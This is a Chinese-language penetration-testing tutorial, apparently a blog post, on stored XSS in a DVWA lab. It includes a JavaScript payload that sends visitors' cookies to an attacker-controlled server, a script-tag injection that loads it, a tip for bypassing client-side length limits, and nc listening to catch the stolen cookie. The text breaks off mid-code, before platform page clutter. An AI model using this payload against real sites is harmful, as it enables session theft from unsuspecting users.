kali渗透学习-Web渗透XSS(三)存储型XSS、DOM型XSS、神器BEFF

存储型XSS

1、可长期存储于服务器端

2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口

#攻击利用方法大体等于反射型xss利用

##多出现在留言板等位置

*推荐使用burpsuite
a、观察返回结果,是否原封不动地返回输入数据?是否有其他标签
在这里插入图片描述
js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗
在这里插入图片描述
注入后会永久在服务器端,每次访问都会下发该注入。
用dvwa测试的时候消除注入需在设置中重置数据库

b、测试加载攻击者控制的服务器中的js文件

#启动apache2【默认侦听80端口】
在这里插入图片描述
a.js 【盗取客户端cookie信息,并把它上传到攻击者控制的服务器的PHP文件】

var img = new Image();
img.src = "http://192.168.56.102:88/cookies.php?
cookie="+document.cookie;

***默认在客户端进行长度的限制,可用burpsuite进行绕过或直接修改HTML代码中的长度限制  【安全性好的,同时在客户端跟服务器端进行长度限制】
在这里插入图片描述

<script src="http://192.168.56.102/a.js"></script>

使用nc演示效果,侦听88端口,提交成功/刷新页面,即可成功获得cookie
在这里插入图片描述
代码审计  【以下代码只是对输入数据进行过滤】

<?php

if(isset($_POST['btnSign']))
{
   

   $message = trim($_POST['mtxMessage']);
   $name    
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值